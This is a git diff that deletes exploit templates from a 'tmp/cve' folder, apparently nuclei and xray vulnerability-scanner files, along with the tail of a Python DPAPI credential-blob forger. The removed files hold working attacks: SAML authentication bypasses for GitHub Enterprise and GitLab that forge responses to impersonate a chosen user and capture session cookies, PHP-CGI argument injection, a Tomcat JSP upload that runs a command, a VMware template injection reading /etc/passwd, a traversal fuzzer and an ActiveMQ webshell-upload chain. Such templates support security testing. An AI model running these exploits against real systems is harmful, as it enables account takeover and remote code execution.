-
- for i in range(len(hash_bytes)):
- ipad[i] ^= hash_bytes[i]
- opad[i] ^= hash_bytes[i]
-
- if alg_hash == self.CALG_SHA1:
- sha1 = SHA1.new()
- ipad_sha1bytes = sha1.new(ipad).digest()
- opad_sha1bytes = sha1.new(opad).digest()
- return self.combine_bytes(ipad_sha1bytes, opad_sha1bytes)
- else:
- raise Exception(f"Unsupported alg_hash: {alg_hash}")
-
- def derive_key2(self, key, nonce, hash_algorithm, blob, entropy=None):
- """
- Derive a key using the provided key, nonce, hash algorithm, blob, and optional entropy.
-
- :param key: The base key material.
- :param nonce: The nonce (salt) value.
- :param hash_algorithm: The hash algorithm identifier (SHA1, SHA256, SHA512).
- :param blob: The additional data to include in the key derivation.
- :param entropy: Optional entropy to include in the key derivation.
- :return: The derived key as a byte array.
- """
- if hash_algorithm == self.CALG_SHA1:
- hmac = HMAC.new(key, digestmod=SHA1)
- elif hash_algorithm == self.CALG_SHA_256:
- hmac = HMAC.new(key, digestmod=SHA256)
- elif hash_algorithm == self.CALG_SHA_512:
- hmac = HMAC.new(key, digestmod=SHA512)
- else:
- raise Exception(f"Unsupported hash algorithm: {hash_algorithm}")
-
- key_material = bytearray()
- key_material.extend(nonce)
-
- if entropy is not None:
- key_material.extend(entropy)
-
- key_material.extend(blob)
-
- hmac.update(key_material)
- return hmac.digest()
-
- def derive_key(self, key_bytes, salt_bytes, alg_hash, entropy=None):
- if alg_hash == self.CALG_SHA_512:
- if entropy is not None:
- return self.hmac_sha512(key_bytes, self.combine_bytes(salt_bytes, entropy))
- else:
- return self.hmac_sha512(key_bytes, salt_bytes)
- elif alg_hash == self.CALG_SHA1:
- ipad = bytearray([0x36] * 64)
- opad = bytearray([0x5C] * 64)
-
- for i in range(len(key_bytes)):
- ipad[i] ^= key_bytes[i]
- opad[i] ^= key_bytes[i]
-
- buffer_i = self.combine_bytes(ipad, salt_bytes)
-
- sha1 = SHA1.new()
- sha1.update(buffer_i)
- sha1_buffer_i = sha1.digest()
-
- buffer_o = self.combine_bytes(opad, sha1_buffer_i)
- if entropy is not None:
- buffer_o = self.combine_bytes(buffer_o, entropy)
-
- sha1.update(buffer_o)
- sha1_buffer_o = sha1.digest()
-
- return self.derive_key_raw(sha1_buffer_o, alg_hash)
- else:
- raise Exception("Unsupported Hash Algorithm")
-
- def encrypt(self, plaintext, key, algCrypt):
- if algCrypt == self.CALG_3DES:
- iv = b'\x00' * 8
- cipher = DES3.new(key, DES3.MODE_CBC, iv)
- elif algCrypt == self.CALG_AES_256:
- iv = b'\x00' * 16
- cipher = AES.new(key, AES.MODE_CBC, iv)
- else:
- raise Exception(f"Unsupported encryption algorithm: {algCrypt}")
-
- padded_data = pad(plaintext, cipher.block_size)
- return cipher.encrypt(padded_data)
-
- def create_blob(self, plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags=0, entropy=None, description=""):
- descBytes = description.encode('utf-16le') if description else b'\x00\x00'
- saltBytes = os.urandom(32)
- hmac2KeyLen = 32
-
- if algCrypt == self.CALG_3DES:
- algCryptLen = 192
- elif algCrypt == self.CALG_AES_256:
- algCryptLen = 256
- else:
- raise Exception(f"Unsupported encryption algorithm: {algCrypt}")
-
- if algHash == self.CALG_SHA1:
- signLen = 20
- elif algHash == self.CALG_SHA_256:
- signLen = 32
- elif algHash == self.CALG_SHA_512:
- signLen = 64
- else:
- raise Exception(f"Unsupported hash algorithm: {algHash}")
-
- # Derive key
- derivedKeyBytes = self.derive_key(masterKey, saltBytes, algHash, entropy)
- finalKeyBytes = derivedKeyBytes[:algCryptLen // 8]
-
- # Encrypt data
- encData = self.encrypt(plaintext, finalKeyBytes, algCrypt)
-
- # Construct the BLOB using BytesIO
- blob = BytesIO()
-
- # Version
- blob.write((1).to_bytes(4, 'little'))
-
- # Provider GUID
- providerGuid = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le
- blob.write(providerGuid)
-
- # MasterKey version
- blob.write((1).to_bytes(4, 'little'))
-
- # MasterKey GUID
- blob.write(masterKeyGuid.bytes_le)
-
- # Flags
- blob.write((flags).to_bytes(4, 'little'))
-
- # Description length
- blob.write(len(descBytes).to_bytes(4, 'little'))
-
- # Description
- blob.write(descBytes)
-
- # Algorithm ID
- blob.write(algCrypt.to_bytes(4, 'little'))
-
- # Algorithm key length
- blob.write(algCryptLen.to_bytes(4, 'little'))
-
- # Salt length
- blob.write(len(saltBytes).to_bytes(4, 'little'))
-
- # Salt
- blob.write(saltBytes)
-
- # HMAC key length (always 0)
- blob.write((0).to_bytes(4, 'little'))
-
- # Hash algorithm ID
- blob.write(algHash.to_bytes(4, 'little'))
-
- # Hash length
- blob.write((len(derivedKeyBytes) * 8).to_bytes(4, 'little'))
-
- # HMAC2 key length
- blob.write(hmac2KeyLen.to_bytes(4, 'little'))
-
- # HMAC2 key
- hmac2Key = os.urandom(hmac2KeyLen)
- blob.write(hmac2Key)
-
- # Data length
- blob.write(len(encData).to_bytes(4, 'little'))
-
- # Encrypted Data
- blob.write(encData)
-
- # Create the HMAC (sign) over the entire blob except for the sign field
- signBlob = blob.getvalue()[20:] # Skip the first 20 bytes for the HMAC calculation
- sign = self.derive_key2(masterKey, hmac2Key, algHash, signBlob, entropy)
-
- # Sign length
- blob.write(signLen.to_bytes(4, 'little'))
-
- # Sign
- blob.write(sign)
-
- return blob.getvalue()
-
- def main():
- args = {
- 'master_key': '48F4153A8C26C2B026562685B67C30EFF119D735',
- 'master_key_guid': '98dc3c79-9aa5-4efc-927f-ccec24eaa14e',
- 'local': 1,
- 'base64': 1
- }
- current_time = datetime.utcnow().strftime("%Y%m%dT%H%M%SZ")
- future_time = (datetime.utcnow() + timedelta(days=1)).strftime("%Y%m%dT%H%M%SZ")
-
- plaintext= f"local,admin,Primary,Password,{current_time},{future_time}"
- plaintext=plaintext.encode('utf-8')
- if not all(c in string.hexdigits for c in args['master_key']):
- print (f' Provided master key is not valid: {args.master_key}')
- return
-
- try:
- uuid.UUID(args["master_key_guid"])
- except ValueError:
- print (f' Provided master key GUID is not valid: {args["master_key_guid"]}')
- return
-
- # Parse the master key and GUID
- masterKey = bytes.fromhex(args['master_key'])
- masterKeyGuid = uuid.UUID(args["master_key_guid"])
- algCrypt = DPAPIBlob.CALG_AES_256
- algHash = DPAPIBlob.CALG_SHA_512
- flags = 0
-
- if args['local']:
- flags |= 4 # CRYPTPROTECT_LOCAL_MACHINE
-
- dpapi = DPAPIBlob()
- encrypted_blob = dpapi.create_blob(plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags)
-
- if args['base64']:
- output_data = base64.b64encode(encrypted_blob).decode('utf-8')
- else:
- output_data = encrypted_blob.hex(' ')
-
- print(f"{output_data}")
-
- if __name__ == "__main__":
- main()
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa"
- headers:
- Cookie: "CsrfToken=aaa; stsIdentity0={{code_response}}"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "access_token="
- - "RelyingPartyUrl"
- condition: and
-
- - type: word
- part: content_type
- words:
- - 'application/json'
-
- - type: status
- status:
- - 200
-# digest: 4b0a00483046022100c1e04d6c3c9b3781cddc3a25c1575a5ba79913fcb113b949659cbe6f87802da4022100ffc7b910822ab03f153975956bc9be2f175452f64a182962f4c3f93e1b7f68c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2024-4577.yaml b/tmp/cve/CVE-2024-4577.yaml
deleted file mode 100644
index 5206bb7e7d..0000000000
--- a/tmp/cve/CVE-2024-4577.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2024-4577
-
-info:
- name: CVE-2024-4577 PHP CGI Argument Injection
- author: Hüseyin TINTAŞ
- severity: critical
- description: >
- CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
- This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
-
- headers:
- Accept: "*/*"
- Content-Type: "application/x-www-form-urlencoded"
- Connection: "keep-alive"
- body: |
-
- matchers:
- - type: md5
- hash: 83946a388fdf6cd2707eed8550575a76
- status: 200
diff --git a/tmp/cve/CVE-2024-50379.yaml b/tmp/cve/CVE-2024-50379.yaml
deleted file mode 100644
index 1dcbaa7951..0000000000
--- a/tmp/cve/CVE-2024-50379.yaml
+++ /dev/null
@@ -1,74 +0,0 @@
-id: CVE-2024-50379
-info:
- name: Apache Tomcat TOCTOU RCE
- author: JF0x0r
- severity: critical
- description: |
- Apache Tomcat es vulnerable a una condición de carrera TOCTOU (Time-of-Check Time-of-Use) durante la compilación de archivos JSP.
- Esto permite a los atacantes reemplazar archivos JSP con versiones maliciosas, llevando a la ejecución remota de código (RCE).
- references:
- - https://www.cvedetails.com/cve/CVE-2024-50379
- - https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r
- tags: tomcat,rce,toctou
-
-requests:
- - raw:
- - |
- POST /upload.jsp HTTP/1.1
- Host: {{Hostname}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
- Content-Length: 294
-
- ------WebKitFormBoundary
- Content-Disposition: form-data; name="file"; filename="hello.jsp"
- Content-Type: text/plain
-
- <% out.println("Hello, World!"); %>
- ------WebKitFormBoundary--
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "File uploaded successfully"
- part: body
-
- - raw:
- - |
- POST /uploads/upload.jsp HTTP/1.1
- Host: {{Hostname}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
- Content-Length: 547
-
- ------WebKitFormBoundary
- Content-Disposition: form-data; name="file"; filename="HELLO.JSP"
- Content-Type: text/plain
-
- <%@ page import="java.io.*" %>
- <%
- Runtime.getRuntime().exec("calc.exe");
- %>
- ------WebKitFormBoundary--
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "File uploaded successfully"
- part: body
-
- - raw:
- - |
- GET /uploads/hello.jsp HTTP/1.1
- Host: {{Hostname}}
-
- matchers-condition: or
- matchers:
- - type: word
- words:
- - "Calculator has been opened successfully"
- part: body
- - type: word
- words:
- - "Error while opening calculator"
- part: body
diff --git a/tmp/cve/CVE-2024-9487.yaml b/tmp/cve/CVE-2024-9487.yaml
deleted file mode 100644
index e23e35c813..0000000000
--- a/tmp/cve/CVE-2024-9487.yaml
+++ /dev/null
@@ -1,192 +0,0 @@
-id: CVE-2024-9487
-
-info:
- name: GitHub Enterprise - SAML Authentication Bypass
- author: iamnoooob,rootxharsh,pdresearch
- severity: critical
- description: |
- An improper verification of cryptographic signature vulnerability was identified in GitHub Enterprise Server that allowed SAML SSO authentication to be bypassed resulting in unauthorized provisioning of users and access to the instance. Exploitation required the encrypted assertions feature to be enabled, and the attacker would require direct network access as well as a signed SAML response or metadata document. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.15 and was fixed in versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2. This vulnerability was reported via the GitHub Bug Bounty program.
- reference:
- - https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass
- - https://github.com/advisories/GHSA-g83h-4727-5rpv
- classification:
- epss-score: 0.00045
- epss-percentile: 0.16808
- metadata:
- verified: true
- shodan-query: title:"GitHub Enterprise"
- tags: github,ghe,saml,auth-bypass,sso
-
-code:
- - engine:
- - ruby
-
- source: |
- ## Variable Usage:
- # username - Victim Github Username/Email to impersonate.
- # SAMLResponse - SAML Response body.
- # metadata_url - IDP's Metadata URL.
- # RelayState - Relay state associated with the SAML Response body.
-
- require 'nokogiri'
- require 'openssl'
- require 'base64'
- require 'cgi'
- require 'open-uri'
- saml_response_xml = Base64.decode64(CGI.unescape(ENV['SAMLResponse']))
- saml_response = Nokogiri::XML(saml_response_xml)
- namespaces = {'ds' => 'http://www.w3.org/2000/09/xmldsig#','saml2' => 'urn:oasis:names:tc:SAML:2.0:assertion','saml2p' => 'urn:oasis:names:tc:SAML:2.0:protocol'}
- issuer = saml_response.xpath('//saml2:Issuer', namespaces).first.text
-
- metadata_idp_url = (ENV['metadata_url'])
- # URL to fetch the XML from
- url = "#{ENV['RootURL']}/saml/metadata"
- begin
- # Open the URL and read the XML
- xml_content = URI.open(url,{ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }).read
- xml_content_idp = URI.open(metadata_idp_url,{ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }).read
- # Parse the XML content with Nokogiri
- doc = Nokogiri::XML(xml_content)
- idp_doc = Nokogiri::XML(xml_content_idp)
-
- # Extract the ds:X509Certificate
- certificate = doc.at_xpath('//ds:X509Certificate', 'ds' => 'http://www.w3.org/2000/09/xmldsig#')
- audience = doc.at_xpath('//md:EntityDescriptor/@entityID').value
- recipient = doc.at_xpath('//md:AssertionConsumerService/@Location').value
- idp_cert = idp_doc.at_xpath('//ds:X509Certificate', 'ds' => 'http://www.w3.org/2000/09/xmldsig#')
-
-
- # Print the extracted certificate
- if certificate
- enc_cert = Base64.decode64("#{certificate.text.strip}")
- else
- puts "ds:X509Certificate not found in the XML."
- end
-
- rescue OpenURI::HTTPError => e
- puts "HTTP Error: #{e.message}"
- rescue => e
- puts "An error occurred: #{e.message}"
- end
- signed_assertion_xml = <<-XML
- issuer_replace2n9HGB3mHU+gxo8DJrIw0MwT/Gs7/agpmo+C1sb7mtU=OYOIw4wMFxm3OaG/n7YbQxcWKAFDmUjD33WIQJ3VgdsWdfV141v34AcV0tQ3A5dh9vWsM7/Kn3D0HETJzylJUaI4HhWWkNHrGpPX07Tjd0Yk7y9cD3+AzjIIsYlLGtpHFQ6jNAIzq4BumR+sb0ERQaG7IQqxgkCRY49YFtcJryxwjsgu/LD4gI7wOLdWh2cnZgReH5s9hXzyXaRoziUNdSv5McZx/T3VV76qGE2GZbQUGnBm9jwHjGriedi1PksKZxxcKdsumXk20i+fWEU8ueQJYm1mIHQa5bn2AVgE8D1grOYlhAOgjV8ByXZB0hC0Zkrgth9h1ij9rY9yBRxPVw==cert_replaceuser_replaceaudience_replaceurn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransportuser_replace
- XML
-
- signed_assertion_xml = signed_assertion_xml.gsub "cert_replace", idp_cert
- doc = Nokogiri::XML(signed_assertion_xml)
-
- signed_assertion_xml = doc.to_xml(:indent => 0, :save_with => Nokogiri::XML::Node::SaveOptions::AS_XML)
-
- cert = enc_cert
- cert = OpenSSL::X509::Certificate.new(cert)
- public_key = cert.public_key
-
- # Encrypt the signed assertion node using AES and RSA for key wrapping
- def encrypt_assertion(assertion_node, rsa_public_key)
- # Create a random AES key for encrypting the data
- aes_key = OpenSSL::Cipher.new('AES-256-CBC').random_key
-
- # Encrypt the signed assertion (as an XML string)
- cipher = OpenSSL::Cipher.new('AES-256-CBC')
- cipher.encrypt
- cipher.key = aes_key
-
- encrypted_data = cipher.update(assertion_node) + cipher.final
-
- # Encrypt the AES key using the RSA public key
- encrypted_aes_key = rsa_public_key.public_encrypt(aes_key, 4)
-
-
- # Base64 encode both the encrypted data and the encrypted AES key
- encrypted_data_b64 = Base64.encode64(encrypted_data)
- encrypted_aes_key_b64 = Base64.encode64(encrypted_aes_key)
- encrypted_assertion_xml = <<-XML
-
-
-
-
-
-
-
- #{encrypted_aes_key_b64}
-
-
-
-
- #{encrypted_data_b64}
-
-
-
- XML
-
- Nokogiri::XML(encrypted_assertion_xml)
- end
-
- # Parse the signed assertion into Nokogiri XML document
- doc = Nokogiri::XML(signed_assertion_xml)
- assertion_node = doc.at('//saml2:Assertion', namespaces)
- assertion_node_str= assertion_node.to_xml(:indent => 0, :save_with => Nokogiri::XML::Node::SaveOptions::AS_XML)
- assertion_node_str = assertion_node_str.gsub! "user_replace", "#{ENV['username']}"
- assertion_node_str = assertion_node_str.gsub! "issuer_replace", issuer
- assertion_node_str = assertion_node_str.gsub! "recipient_replace", recipient
- assertion_node_str = assertion_node_str.gsub! "audience_replace", audience
- assertion_node_1 = Nokogiri::XML(assertion_node_str)
- assertion_node_dup = assertion_node_1.dup
- assertion_node_dup.at_xpath("//ds:Signature", namespaces).remove
-
- assertion_node_dup.xpath('//text()').each do |text_node|
- text_node.content = text_node.text.strip
- end
-
- canonical_xml = assertion_node_dup.canonicalize(
- Nokogiri::XML::XML_C14N_EXCLUSIVE_1_0,
- [], # InclusiveNamespaces PrefixList
- false # WithComments
- )
-
- # Compute the SHA-256 Digest
- digest = OpenSSL::Digest::SHA256.digest(canonical_xml)
- digest_base64 = Base64.encode64(digest).strip
- assertion_node_1.at_xpath("//ds:DigestValue", namespaces).content = digest_base64
- final_assertion_node_str = assertion_node_1.to_xml(:indent => 0, :save_with => Nokogiri::XML::Node::SaveOptions::AS_XML)
- encrypted_assertion_node = encrypt_assertion("padinggggggggggg"+final_assertion_node_str, public_key)
- encrypted_assertion_node_str = encrypted_assertion_node.to_xml
-
- #create new saml doc
-
- saml_resp_node = saml_response.at('/saml2p:Response', namespaces)
- saml_resp_sign_node = saml_response.at('/saml2p:Response/ds:Signature', namespaces)
- saml_resp_sign_key_node = saml_response.at('/saml2p:Response/ds:Signature/ds:KeyInfo', namespaces)
- object_node = Nokogiri::XML::Node.new("Object", saml_resp_sign_node)
- object_node.namespace = saml_resp_sign_node.namespace
- object_node.add_child(saml_resp_node.dup)
- saml_resp_sign_key_node.add_next_sibling(object_node)
- encrypted_assertion_node = Nokogiri::XML(encrypted_assertion_node_str)
- encrypted_assertion_node1 = encrypted_assertion_node.at_xpath('//saml2:EncryptedAssertion', namespaces )
- saml_response.at_xpath('/saml2p:Response/saml2:EncryptedAssertion', namespaces).replace(encrypted_assertion_node1)
- saml_resp_node['ID'] = saml_resp_node['ID'][0..-3]+"ae"
- puts CGI.escape(Base64.strict_encode64(saml_response.to_xml(:indent => 0, :save_with => Nokogiri::XML::Node::SaveOptions::AS_XML)))
-
-http:
- - raw:
- - |
- POST /saml/consume HTTP/1.1
- Host: {{Hostname}}
- Cookie: saml_csrf_token={{RelayState}}; saml_csrf_token_legacy={{RelayState}};
- Content-Type: application/x-www-form-urlencoded
-
- RelayState={{RelayState}}&SAMLResponse={{code_response}}
-
- matchers:
- - type: dsl
- dsl:
- - 'contains(header,"dotcom_user")'
- - 'status_code == 302'
- condition: and
-
- extractors:
- - type: kval
- kval:
- - user_session
-
-# digest: 4b0a00483046022100ac239d4df66a993d4ce33585b96c7cfe80c8511a0347f702275717398724a8f2022100b3a5bad1a2150d067f2dd6c24cfd79455d717915120f355841378f468698536a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE_RCE2-1.yaml b/tmp/cve/CVE_RCE2-1.yaml
deleted file mode 100644
index 9302423a09..0000000000
--- a/tmp/cve/CVE_RCE2-1.yaml
+++ /dev/null
@@ -1,129 +0,0 @@
-id: CVE_RCE2-1
-info:
- name: CVE_RCE2
- author: 0x240x23elu
- severity: high
-
-requests:
-
- - payloads:
- dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt
-
-
-
- attack: sniper # Available options: sniper, pitchfork and clusterbomb
- threads: 50
- raw:
- # Request with simple param and header manipulation with DSL functions
- - |
- GET /§dirt§ HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: Trailers
- Accept: */*
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: §dirt§
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: Trailers
- Accept: */*
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Accept-Encoding: gzip, deflate, br
- Referer: §dirt§
- Connection: keep-alive
- TE: Trailers
- Accept: */*
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Accept-Encoding: gzip, deflate, br
- Referer: {{BaseURL}}
- Connection: §dirt§
- TE: Trailers
- Accept: */*
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Accept-Encoding: gzip, deflate, br
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: §dirt§
- Accept: */*
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Accept-Encoding: gzip, deflate, br
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: Trailers
- Accept: §dirt§
- Accept-Encoding: */*
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: Trailers
- Accept: */*
- Accept-Encoding: §dirt§
- Accept-Language : */*
- Connection: */*
- Upgrade-Insecure-Requests: 1
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Referer: {{BaseURL}}
- Connection: keep-alive
- TE: Trailers
- Accept: */*
- Accept-Encoding: */*
- Accept-Language: §dirt§
- Upgrade-Insecure-Requests: 1
-
-
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- part: body
diff --git a/tmp/cve/GitLab-SAML-Authentication-Bypass-CVE-2024-45409.yaml b/tmp/cve/GitLab-SAML-Authentication-Bypass-CVE-2024-45409.yaml
deleted file mode 100644
index 0b4119d81c..0000000000
--- a/tmp/cve/GitLab-SAML-Authentication-Bypass-CVE-2024-45409.yaml
+++ /dev/null
@@ -1,124 +0,0 @@
-id: CVE-2024-45409
-
-info:
- name: GitLab - SAML Authentication Bypass
- author: iamnoooob,rootxharsh,pdresearch
- severity: critical
- description: |
- The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response.
- impact: |
- An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system.
- remediation: |
- This vulnerability is fixed in 1.17.0 and 1.12.3.
- reference:
- - https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
- - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
- - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
- - https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2024-45409
- cwe-id: CWE-347
- metadata:
- verified: true
- shodan-query: http.title:"GitLab"
- product: gitlab
- vendor: gitlab
- tags: cve,cve2024,saml,auth-bypass,gitlab,code
-
-code:
- - engine:
- - py
- - python3 # requires python to be pre-installed on system running nuclei
- source: |
- try:
- from lxml import etree
- except ImportError:
- raise ImportError("The 'lxml' library is not installed. Please install it using 'pip install lxml'.")
- import hashlib,os
- import base64
- from datetime import datetime, timedelta
- import urllib.parse
- import requests
- username = os.getenv('username')
- if not username:
- username='admin@example.com'
- saml_response = os.getenv('SAMLResponse')
- xml_content = base64.b64decode(urllib.parse.unquote(saml_response))
- parser = etree.XMLParser(remove_blank_text=True)
- root = etree.fromstring(xml_content, parser)
-
- namespaces = {
- 'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol',
- 'saml': 'urn:oasis:names:tc:SAML:2.0:assertion',
- 'ds': 'http://www.w3.org/2000/09/xmldsig#'
- }
-
- response_signature = root.find('./ds:Signature', namespaces)
- if response_signature is not None:
- root.remove(response_signature)
-
- nameid = root.find(
- './/saml:NameID',
- namespaces
- )
- if nameid is not None:
- nameid.text = username
-
- attribute_values = root.findall('.//saml:AttributeValue', namespaces)
- for attr_value in attribute_values:
- attr_value.text = username
-
- assertion = root.find('.//saml:Assertion', namespaces)
- if assertion is not None:
- # Create a deep copy of the assertion for digest calculation
- assertion_copy = etree.fromstring(etree.tostring(assertion))
- signature_in_assertion = assertion_copy.find('.//ds:Signature', namespaces)
- if signature_in_assertion is not None:
- signature_in_assertion.getparent().remove(signature_in_assertion)
- canonicalized_assertion = etree.tostring(
- assertion_copy, method='c14n', exclusive=True, with_comments=False
- )
- digest = hashlib.sha256(canonicalized_assertion).digest()
- digest_value = base64.b64encode(digest).decode()
- else:
- digest_value = ''
-
- issuer = root.find('.//saml:Issuer', namespaces)
- if issuer is not None:
- parent = issuer.getparent()
- index = parent.index(issuer)
- extensions = etree.Element('{urn:oasis:names:tc:SAML:2.0:protocol}Extensions')
- digest_element = etree.SubElement(
- extensions, '{http://www.w3.org/2000/09/xmldsig#}DigestValue'
- )
- digest_element.text = digest_value
- parent.insert(index + 1, extensions)
-
- malformed_samlresponse = urllib.parse.quote(base64.b64encode((etree.tostring(
- root, pretty_print=False, xml_declaration=True, encoding='UTF-8'
- ))))
- print(malformed_samlresponse)
-
-http:
- - raw:
- - |
- POST /users/auth/saml/callback HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- RelayState=undefined&SAMLResponse={{code_response}}
-
- matchers:
- - type: dsl
- dsl:
- - 'contains(header,"known_sign_in")'
- - 'status_code == 302'
- condition: and
-
- extractors:
- - type: kval
- kval:
- - _gitlab_session
-# digest: 4b0a00483046022100aac3014dc61bab8223d36c1bd10f19aa4886b33778e2b16cf891fce7f7c24bee022100a42cd0b25c8f4a54304541ca26f508284772b55881c43962eb396092205425ff:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/cve/VMware-CVE-2022-22954-RCE.yml b/tmp/cve/VMware-CVE-2022-22954-RCE.yml
deleted file mode 100644
index 63384defba..0000000000
--- a/tmp/cve/VMware-CVE-2022-22954-RCE.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-name: VMware-CVE-2022-22954-RCE
-# 脚本部分
-transport: http
-rules:
- r1:
- request:
- method: GET
- path: "/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22freemarker%2etemplate%2eutility%2eExecute%22%3fnew%28%29%28%22cat%20%2fetc%2fpasswd%22%29%7d"
- User-Agent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'
- expression: |
- "root:[x*]:0:0:".bmatches(response.body)
-expression:
- r1()
-# 信息部分
-detail:
- author: name(link)
- links:
- - https://github.com/sherlocksecurity/VMware-CVE-2022-22954
diff --git a/tmp/cve/activemq-cve-2016-3088.yaml b/tmp/cve/activemq-cve-2016-3088.yaml
deleted file mode 100644
index 8d0d7b54a8..0000000000
--- a/tmp/cve/activemq-cve-2016-3088.yaml
+++ /dev/null
@@ -1,46 +0,0 @@
-name: poc-yaml-activemq-cve-2016-3088
-manual: true
-transport: http
-set:
- filename: randomLowercase(6)
- fileContent: randomLowercase(6)
-rules:
- r0:
- request:
- cache: true
- method: PUT
- path: /fileserver/{{filename}}.txt
- body: |
- {{fileContent}}
- expression: response.status == 204
- r1:
- request:
- cache: true
- method: GET
- path: /admin/test/index.jsp
- follow_redirects: false
- expression: response.status == 200
- output:
- search: '"activemq.home=(?P.*?),".bsubmatch(response.body)'
- home: search["home"]
- r2:
- request:
- cache: true
- method: MOVE
- path: /fileserver/{{filename}}.txt
- headers:
- Destination: file://{{home}}/webapps/api/{{filename}}.jsp
- follow_redirects: false
- expression: response.status == 204
- r3:
- request:
- cache: true
- method: GET
- path: /api/{{filename}}.jsp
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
-expression: r0() && r1() && r2() && r3()
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
diff --git a/tmp/cve/activemq-cve-2016-3088.yml b/tmp/cve/activemq-cve-2016-3088.yml
deleted file mode 100644
index decb617351..0000000000
